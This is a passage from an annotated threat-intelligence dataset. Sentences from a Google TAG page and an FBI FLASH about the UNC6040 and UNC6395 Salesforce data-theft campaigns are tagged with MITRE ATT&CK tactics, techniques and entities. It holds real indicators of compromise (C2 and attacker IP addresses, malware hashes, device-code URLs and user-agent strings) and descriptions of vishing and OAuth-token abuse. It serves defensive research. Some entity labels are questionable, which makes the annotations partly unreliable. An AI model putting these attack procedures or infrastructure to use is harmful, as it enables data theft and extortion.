samples:\n9eacade8174f008c48ea57d43068dbce3d91093603db0511467c18252f60de32\n6214e19836c0c3c4bc94e23d6391c45ad87fdd890f6cbd3ab078650455c31dc8\n201c4d0070552d9dc06b76ee55479fc0a9dfacb6dbec6bbec5265e04644eebc9\n1fd5326034792c0f0fb00be77629a10ac9162b2f473f96072397a5d639da45dd\n01cc151149b5bf974449b00de08ce7dbf5eca77f55edd00982a959e48d017225", "sentence_text": "Recent BUMBLEBEE C2:\n23.81.246[.]187:443\nPOSTED IN:\nRelated stories\nThreat Analysis Group TAG Bulletin: Q2 2025 Our bulletin covering coordinated influence operation campaigns terminated on our platforms in Q2 2025.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Operates BUMBLEBEE C2 infrastructure on port 443", "entities": [ { "text": "23.81.246[.]187:443", "start": 21, "end": 40, "label": "Infrastructure_Indicator" }, { "text": " BUMBLEBEE C2:", "start": 6, "end": 20, "label": "MalwareTool" } ] }, { "uid": "mitre-100_mitre_report-p1-s36-0d6618", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "Recent BUMBLEBEE C2:\n23.81.246[.]187:443\nPOSTED IN:\nRelated stories\nThreat Analysis Group TAG Bulletin: Q2 2025 Our bulletin covering coordinated influence operation campaigns terminated on our platforms in Q2 2025.", "sentence_text": "By\nBilly Leonard\nThreat Analysis Group TAG Bulletin: Q1 2025 This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q1 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s37-5b9e1c", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "By\nBilly Leonard\nThreat Analysis Group TAG Bulletin: Q1 2025 This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q1 2025.", "sentence_text": "It was last updated on May 15, 2025.JanuaryWe terminated 12 YouT…", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s38-b750f0", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "It was last updated on May 15, 2025.JanuaryWe terminated 12 YouT…", "sentence_text": "This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q4 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s39-376bc2", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q4 2024.", "sentence_text": "It was last updated on February 19, 2024.OctoberWe terminated 11…", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s40-b60979", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "It was last updated on February 19, 2024.OctoberWe terminated 11…", "sentence_text": "By Billy Leonard Dec 17, 2024 Threat Analysis Group TAG Bulletin: Q3 2024 This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q3 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s41-7d5286", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "By Billy Leonard Dec 17, 2024 Threat Analysis Group TAG Bulletin: Q3 2024 This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q3 2024.", "sentence_text": "It was last updated on January 14, 2025.JulyWe terminated 89 You… By Billy Leonard Sep 12, 2024 Threat Analysis Group State-backed attackers and commercial surveillance vendors repeatedly use the same exploits By Clement Lecigne Aug 29, 2024 Threat Analysis Group Iranian backed group steps up phishing campaigns against Israel, U.S.\nGoogle’s Threat Analysis Group shares insights on APT42, an Iranian government-backed threat actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-100_mitre_report-p1-s42-4d9eac", "source": "mitre", "doc_id": "100_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "It was last updated on January 14, 2025.JulyWe terminated 89 You… By Billy Leonard Sep 12, 2024 Threat Analysis Group State-backed attackers and commercial surveillance vendors repeatedly use the same exploits By Clement Lecigne Aug 29, 2024 Threat Analysis Group Iranian backed group steps up phishing campaigns against Israel, U.S.\nGoogle’s Threat Analysis Group shares insights on APT42, an Iranian government-backed threat actor.", "sentence_text": "By\nGoogle Threat Analysis Group Aug 14, 2024", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p1-s1-a32c13", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "TLP:CLEAR\n12 September 2025", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p1-s2-c2e8e5", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "TLP:CLEAR\n12 September 2025", "sentence_text": "This data is provided in order to help cyber security professionals and system administrators to guard against the persistent malicious FLASH Number actions of cyber actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p1-s3-6c09b1", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "This data is provided in order to help cyber security professionals and system administrators to guard against the persistent malicious FLASH Number actions of cyber actors.", "sentence_text": "This FLASH was coordinated with DHS/CISA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p1-s4-28bc18", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "This FLASH was coordinated with DHS/CISA.", "sentence_text": "FLASH-20250912-001\nThis FLASH has been released TLP:CLEAR WE NEED YOUR HELP!", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p1-s5-229499", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "FLASH-20250912-001\nThis FLASH has been released TLP:CLEAR WE NEED YOUR HELP!", "sentence_text": "If you identify any suspicious activity within your enterprise or have related information, please contact your local FBI Cyber Squad immediately with respect to the procedures outlined in the Reporting Notice section of this message.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p1-s6-7f994b", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "If you identify any suspicious activity within your enterprise or have related information, please contact your local FBI Cyber Squad immediately with respect to the procedures outlined in the Reporting Notice section of this message.", "sentence_text": "*Note: By reporting any related information to FBI Cyber Squads, you are assisting in sharing information that allows the FBI to track malicious actors and coordinate with private industry and the United States Government to prevent future intrusions and attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p1-s7-1d24b6", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "*Note: By reporting any related information to FBI Cyber Squads, you are assisting in sharing information that allows the FBI to track malicious actors and coordinate with private industry and the United States Government to prevent future intrusions and attacks.", "sentence_text": "Cyber Criminal Groups UNC6040 and UNC6395 Compromising Salesforce Instances for Data Theft and Extortion", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Compromising Salesforce instances for data theft and extortion", "entities": [ { "text": "UNC6040", "start": 22, "end": 29, "label": "ThreatActor" }, { "text": "UNC6395", "start": 34, "end": 41, "label": "ThreatActor" }, { "text": "Compromising Salesforce Instances for Data Theft and Extortion", "start": 42, "end": 104, "label": "Action" } ] }, { "uid": "mitre-74_mitre_report-p1-s9-4e2db5", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "Summary", "sentence_text": "The Federal Bureau of Investigation (FBI) is releasing this FLASH to disseminate Indicators of Compromise (IOCs) associated with recent malicious cyber activities by cyber criminal groups UNC6040 and UNC6395, responsible for a rising number of data theft and extortion intrusions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p1-s10-fd1f21", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "The Federal Bureau of Investigation (FBI) is releasing this FLASH to disseminate Indicators of Compromise (IOCs) associated with recent malicious cyber activities by cyber criminal groups UNC6040 and UNC6395, responsible for a rising number of data theft and extortion intrusions.", "sentence_text": "Both groups have recently been observed targeting organizations’ Salesforce platforms via different initial access mechanisms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p1-s11-c46605", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "Both groups have recently been observed targeting organizations’ Salesforce platforms via different initial access mechanisms.", "sentence_text": "The FBI is releasing this information to maximize awareness and provide IOCs that may be used by recipients for research and network defense.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p1-s12-5c50ad", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "The FBI is releasing this information to maximize awareness and provide IOCs that may be used by recipients for research and network defense.", "sentence_text": "Technical Details\nInitial Access\nTLP:CLEAR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p2-s13-bd383e", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 2, "sentence_id": 13, "context_before": "Technical Details Initial Access TLP:CLEAR", "sentence_text": "TLP:CLEAR UNC6040 Since October 2024, UNC6040 threat actors have obtained initial access by leveraging social engineering attacks, in particular voice phishing (vishing), to gain access to organizations’ Salesforce accounts.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "UNC6040 gains initial access to Salesforce accounts through social engineering, specifically voice phishing (vishing).", "entities": [ { "text": "UNC6040 threat actors", "start": 38, "end": 59, "label": "ThreatActor" }, { "text": "leveraging social engineering attacks, in particular voice phishing (vishing)", "start": 92, "end": 169, "label": "Action" } ] }, { "uid": "mitre-74_mitre_report-p2-s14-4b0fd0", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 2, "sentence_id": 14, "context_before": "TLP:CLEAR\nUNC6040\nSince October 2024, UNC6040 threat actors have obtained initial access by leveraging social engineering attacks, in particular voice phishing (vishing), to gain access to organizations’ Salesforce accounts.", "sentence_text": "To do so, UNC6040 threat actors commonly call victims’ call centers posing as IT support employees addressing enterprise-wide connectivity issues.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1598.004", "name": "Spearphishing Voice" } ], "procedure": "Called victims’ call centers posing as IT support to address enterprise-wide connectivity issues", "entities": [ { "text": "UNC6040", "start": 10, "end": 17, "label": "ThreatActor" }, { "text": "posing as IT support employees", "start": 68, "end": 98, "label": "Action" }, { "text": "call victims’ call centers", "start": 41, "end": 67, "label": "Action" }, { "text": "call centers", "start": 55, "end": 67, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-74_mitre_report-p2-s16-43436b", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 2, "sentence_id": 16, "context_before": "UNC6040", "sentence_text": "threat actors have utilized phishing panels, directing victims to visit from their mobile phones or work computers during the social engineering calls.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "Utilized phishing panels and directed victims to visit them from their mobile phones or work computers during social engineering calls", "entities": [ { "text": "utilized phishing panels", "start": 19, "end": 43, "label": "Action" }, { "text": "phishing panels", "start": 28, "end": 43, "label": "MalwareTool" }, { "text": "mobile phones", "start": 83, "end": 96, "label": "Infrastructure_Indicator" }, { "text": "work computers", "start": 100, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "directing victims to visit", "start": 45, "end": 71, "label": "Action" } ] }, { "uid": "mitre-74_mitre_report-p2-s17-b8509a", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 2, "sentence_id": 17, "context_before": "threat actors have utilized phishing panels, directing victims to visit from their mobile phones or work computers during the social engineering calls.", "sentence_text": "After obtaining access, UNC6040 threat actors have then used API queries to exfiltrate large volumes of data in bulk.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1020", "name": "Automated Exfiltration" }, { "id": "T1119", "name": "Automated Collection" } ], "procedure": "Used API queries to exfiltrate large volumes of data in bulk", "entities": [ { "text": "UNC6040", "start": 24, "end": 31, "label": "ThreatActor" }, { "text": "exfiltrate", "start": 76, "end": 86, "label": "Action" }, { "text": "used API queries", "start": 56, "end": 72, "label": "Action" }, { "text": "API queries", "start": 61, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "large volumes of data", "start": 87, "end": 108, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-74_mitre_report-p2-s18-30427b", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 2, "sentence_id": 18, "context_before": "After obtaining access, UNC6040 threat actors have then used API queries to exfiltrate large volumes of data in bulk.", "sentence_text": "UNC6040 threat actors have also directly requested user credentials and multifactor authentication codes to authenticate and add the Salesforce Data Loader application, facilitating data exfiltration.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1566.004", "name": "Spearphishing Voice" }, { "id": "T1566", "name": "Phishing" }, { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "Directly requested user credentials and multifactor authentication codes to authenticate and add the Salesforce Data Loader application", "entities": [ { "text": "UNC6040", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "requested user credentials and multifactor authentication codes", "start": 41, "end": 104, "label": "Action" }, { "text": "user credentials", "start": 51, "end": 67, "label": "Infrastructure_Indicator" }, { "text": "multifactor authentication codes", "start": 72, "end": 104, "label": "Infrastructure_Indicator" }, { "text": "facilitating data exfiltration", "start": 169, "end": 199, "label": "Action" }, { "text": "Salesforce Data Loader", "start": 133, "end": 155, "label": "MalwareTool" } ] }, { "uid": "mitre-74_mitre_report-p2-s19-9024ca", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 2, "sentence_id": 19, "context_before": "UNC6040 threat actors have also directly requested user credentials and multifactor authentication codes to authenticate and add the Salesforce Data Loader application, facilitating data exfiltration.", "sentence_text": "UNC6040 threat actors have deceived victims into authorizing malicious connected apps to their organization's Salesforce portal.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1566.004", "name": "Spearphishing Voice" } ], "procedure": "Deceived victims into authorizing malicious connected apps to their organization's Salesforce portal.", "entities": [ { "text": "UNC6040", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "deceived", "start": 27, "end": 35, "label": "Action" }, { "text": "authorizing", "start": 49, "end": 60, "label": "Action" }, { "text": "organization's Salesforce portal", "start": 95, "end": 127, "label": "Infrastructure_Indicator" }, { "text": "malicious connected apps", "start": 61, "end": 85, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-74_mitre_report-p2-s20-e48cd1", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 2, "sentence_id": 20, "context_before": "UNC6040 threat actors have deceived victims into authorizing malicious connected apps to their organization's Salesforce portal.", "sentence_text": "This application is often a modified version of Salesforce’s Data Loader.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p2-s21-e19993", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 2, "sentence_id": 21, "context_before": "This application is often a modified version of Salesforce’s Data Loader.", "sentence_text": "During a vishing call, the actor guides the victim to visit Salesforce's connected app setup page, i.e., grants UNC6040 threat actors significant capabilities to access, query, and exfiltrate sensitive information directly from the compromised Salesforce customer environments.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1566.004", "name": "Spearphishing Voice" } ], "procedure": "Guides the victim to visit Salesforce's connected app setup page, granting UNC6040 threat actors capabilities to access, query, and exfiltrate sensitive information", "entities": [ { "text": "UNC6040", "start": 112, "end": 119, "label": "ThreatActor" }, { "text": "Salesforce's connected app setup page", "start": 60, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "sensitive information", "start": 192, "end": 213, "label": "Infrastructure_Indicator" }, { "text": "Salesforce customer environments", "start": 244, "end": 276, "label": "Infrastructure_Indicator" }, { "text": " guides the victim to visit Salesforce's connected app setup page", "start": 32, "end": 97, "label": "Action" }, { "text": "grants UNC6040 threat actors significant capabilities", "start": 105, "end": 158, "label": "Action" }, { "text": "exfiltrate", "start": 181, "end": 191, "label": "Action" } ] }, { "uid": "mitre-74_mitre_report-p2-s23-5cc8ac", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 2, "sentence_id": 23, "context_before": "UNC6040", "sentence_text": "Some UNC6040 victims have subsequently received extortion emails allegedly from the ShinyHunters group, demanding payment in cryptocurrency to avoid publication of exfiltrated data.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": null, "procedure": "Threat actors send extortion emails demanding cryptocurrency payment to prevent the release of stolen data.", "entities": [ { "text": "ShinyHunters group", "start": 84, "end": 102, "label": "ThreatActor" }, { "text": "extortion emails", "start": 48, "end": 64, "label": "Action" }, { "text": "demanding payment in cryptocurrency", "start": 104, "end": 139, "label": "Action" } ] }, { "uid": "mitre-74_mitre_report-p2-s24-e2bc86", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 2, "sentence_id": 24, "context_before": "Some UNC6040 victims have subsequently received extortion emails allegedly from the ShinyHunters group, demanding payment in cryptocurrency to avoid publication of exfiltrated data.", "sentence_text": "These extortion demands have varied in time following UNC6040 threat actors’ access and data exfiltration, ranging from a period of days to months.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p2-s26-fdb78b", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 2, "sentence_id": 26, "context_before": "UNC6395", "sentence_text": "The FBI is also warning the public about another widespread data theft campaign targeting Salesforce platforms, designated UNC6395, utilizing a different initial access mechanism than UNC6040.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p2-s27-911cc4", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 2, "sentence_id": 27, "context_before": "The FBI is also warning the public about another widespread data theft campaign targeting Salesforce platforms, designated UNC6395, utilizing a different initial access mechanism than UNC6040.", "sentence_text": "In August of 2025, UNC6395 threat actors exploited compromised OAuth tokens for the Salesloft Drift application, an AI chatbot that can be integrated with Salesforce.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "Exploited compromised OAuth tokens for the Salesloft Drift application", "entities": [ { "text": "UNC6395", "start": 19, "end": 26, "label": "ThreatActor" }, { "text": "exploited compromised OAuth tokens", "start": 41, "end": 75, "label": "Action" }, { "text": "compromised OAuth tokens", "start": 51, "end": 75, "label": "Infrastructure_Indicator" }, { "text": "Salesloft Drift application", "start": 84, "end": 111, "label": "Infrastructure_Indicator" }, { "text": "AI chatbot", "start": 116, "end": 126, "label": "Infrastructure_Indicator" }, { "text": "Salesforce", "start": 155, "end": 165, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-74_mitre_report-p2-s28-4f9b35", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 2, "sentence_id": 28, "context_before": "In August of 2025, UNC6395 threat actors exploited compromised OAuth tokens for the Salesloft Drift application, an AI chatbot that can be integrated with Salesforce.", "sentence_text": "Using the TLP:CLEAR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p3-s29-476d1a", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 3, "sentence_id": 29, "context_before": "Using the TLP:CLEAR", "sentence_text": "TLP:CLEAR\ncompromised OAuth tokens and third-party app integration, UNC6395 threat actors were able to compromise victims’ Salesforce instances and exfiltrate data.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Uses compromised OAuth tokens and third-party app integration to access Salesforce instances and exfiltrate data.", "entities": [ { "text": "UNC6395", "start": 68, "end": 75, "label": "ThreatActor" }, { "text": "compromised OAuth tokens", "start": 10, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "victims’ Salesforce instances", "start": 114, "end": 143, "label": "Infrastructure_Indicator" }, { "text": "compromise victims’ Salesforce instances", "start": 103, "end": 143, "label": "Action" }, { "text": "exfiltrate data", "start": 148, "end": 163, "label": "Action" } ] }, { "uid": "mitre-74_mitre_report-p3-s30-8b1b35", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 3, "sentence_id": 30, "context_before": "TLP:CLEAR\ncompromised OAuth tokens and third-party app integration, UNC6395 threat actors were able to compromise victims’ Salesforce instances and exfiltrate data.", "sentence_text": "Indicators\nDisclaimer: The FBI recommends organizations investigate and vet indicators prior to taking action, such as blocking.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p3-s31-e853ce", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 3, "sentence_id": 31, "context_before": "Indicators\nDisclaimer: The FBI recommends organizations investigate and vet indicators prior to taking action, such as blocking.", "sentence_text": "UNC6040 IOCs:\nIP Addresses:\n23.162.8.66 23.234.69.167 23.94.126.63 31.58.169.85 31.58.169.92 31.58.169.96 34.86.51.128 35.186.181.1 37.19.200.132 37.19.200.141 37.19.200.154 37.19.200.167 37.19.221.179 38.22.104.226 45.83.220.206 51.89.240.10 64.95.11.225 64.95.84.159 66.63.167.122 67.217.228.216 68.235.43.202", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p3-s32-42c7ba", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 3, "sentence_id": 32, "context_before": "UNC6040 IOCs:\nIP Addresses:\n23.162.8.66 23.234.69.167 23.94.126.63 31.58.169.85 31.58.169.92 31.58.169.96 34.86.51.128 35.186.181.1 37.19.200.132 37.19.200.141 37.19.200.154 37.19.200.167 37.19.221.179 38.22.104.226 45.83.220.206 51.89.240.10 64.95.11.225 64.95.84.159 66.63.167.122 67.217.228.216 68.235.43.202", "sentence_text": "68.235.46.22 68.235.46.202 68.235.46.151 68.235.46.208 68.63.167.122 69.246.124.204 72.5.42.72 79.127.217.44", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p3-s33-fed474", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 3, "sentence_id": 33, "context_before": "68.235.46.22 68.235.46.202 68.235.46.151 68.235.46.208 68.63.167.122 69.246.124.204 72.5.42.72 79.127.217.44", "sentence_text": "83.147.52.41 87.120.112.134 94.156.167.237 96.44.189.109 96.44.191.141 96.44.191.157 104.223.118.62 104.193.135.221 141.98.252.189 146.70.165.47 146.70.168.239 146.70.173.60 146.70.185.47 146.70.189.47 146.70.189.111 146.70.198.112 146.70.211.55 146.70.211.119 146.70.211.183 147.161.173.90 149.22.81.201 151.242.41.182 151.242.58.76 163.5.149.152", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p3-s34-cf9848", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 3, "sentence_id": 34, "context_before": "83.147.52.41 87.120.112.134 94.156.167.237 96.44.189.109 96.44.191.141 96.44.191.157 104.223.118.62 104.193.135.221 141.98.252.189 146.70.165.47 146.70.168.239 146.70.173.60 146.70.185.47 146.70.189.47 146.70.189.111 146.70.198.112 146.70.211.55 146.70.211.119 146.70.211.183 147.161.173.90 149.22.81.201 151.242.41.182 151.242.58.76 163.5.149.152", "sentence_text": "185.141.119.136 185.141.119.138 185.141.119.151 185.141.119.166 185.141.119.168 185.141.119.181 185.141.119.184 185.141.119.185 185.209.199.56 191.96.207.201 198.44.129.56 198.44.129.88 195.54.130.100 196.251.83.162 198.244.224.200 198.54.130.100 198.54.130.108 198.54.133.123", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p3-s35-ec03c7", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 3, "sentence_id": 35, "context_before": "185.141.119.136 185.141.119.138 185.141.119.151 185.141.119.166 185.141.119.168 185.141.119.181 185.141.119.184 185.141.119.185 185.209.199.56 191.96.207.201 198.44.129.56 198.44.129.88 195.54.130.100 196.251.83.162 198.244.224.200 198.54.130.100 198.54.130.108 198.54.133.123", "sentence_text": "205.234.181.14 206.217.206.14 206.217.206.25 206.217.206.26 206.217.206.64 206.217.206.84 206.217.206.104 206.217.206.124 208.131.130.53 208.131.130.71 208.131.130.91 31.58.169.96 64.94.84.78 64.95.11.225 163.5.149.152 192.198.82.235 23.145.40.165 23.145.40.165 23.145.40.165 TLP:CLEAR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p4-s36-a6a321", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 4, "sentence_id": 36, "context_before": "205.234.181.14 206.217.206.14 206.217.206.25 206.217.206.26 206.217.206.64 206.217.206.84 206.217.206.104 206.217.206.124 208.131.130.53 208.131.130.71 208.131.130.91 31.58.169.96 64.94.84.78 64.95.11.225 163.5.149.152 192.198.82.235 23.145.40.165 23.145.40.165 23.145.40.165 TLP:CLEAR", "sentence_text": "TLP:CLEAR\nURLs/Links:\nLogin[.]salesforce[.]com/setup/connect?user_code=aKYF7V5N\nLogin.salesforce.com/setup/connect?user_code=8KCQGTVU\n91.199.42.164/login\nUNC6395 IOCs:\nIP Addresses:\n208.68.36.90 44.215.108.109 154.41.95.2 176.65.149.100 179.43.159.198 185.130.47.58 185.207.107.130 185.220.101.133 185.220.101.143 185.220.101.164 185.220.101.167 185.220.101.169", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p4-s38-57a9c7", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 4, "sentence_id": 38, "context_before": "185.220.101.180", "sentence_text": "185.220.101.185 185.220.101.33 192.42.116.179 192.42.116.20 194.15.36.117 195.47.238.178 195.47.238.83 User-Agent Strings:\nSalesforce-Multi-Org-Fetcher/1.0\nSalesforce-CLI/1.0\npython-requests/2.32.4\nPython/3.11 aiohttp/3.12.15\nRecommended Mitigations:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p4-s39-e0170e", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 4, "sentence_id": 39, "context_before": "185.220.101.185 185.220.101.33 192.42.116.179 192.42.116.20 194.15.36.117 195.47.238.178 195.47.238.83 User-Agent Strings:\nSalesforce-Multi-Org-Fetcher/1.0\nSalesforce-CLI/1.0\npython-requests/2.32.4\nPython/3.11 aiohttp/3.12.15\nRecommended Mitigations:", "sentence_text": "The FBI recommends network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by cyber criminals:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p4-s40-ebe472", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 4, "sentence_id": 40, "context_before": "The FBI recommends network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by cyber criminals:", "sentence_text": "Preparing for Cyber Incidents:\n• Train call center employees to recognize and report phishing attempts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p4-s41-55a99e", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 4, "sentence_id": 41, "context_before": "Preparing for Cyber Incidents:\n• Train call center employees to recognize and report phishing attempts.", "sentence_text": "• Require phishing-resistant multi-factor authentication (MFA) for as many services as possible.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p4-s42-ea4a79", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 4, "sentence_id": 42, "context_before": "• Require phishing-resistant multi-factor authentication (MFA) for as many services as possible.", "sentence_text": "Apply the Principle of Least Privilege to user accounts and groups, allowing only the performance of authorized actions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p4-s43-6efac6", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 4, "sentence_id": 43, "context_before": "Apply the Principle of Least Privilege to user accounts and groups, allowing only the performance of authorized actions.", "sentence_text": "• Enforce IP-based access restrictions and monitor and detect API usage, looking for unusual or malicious 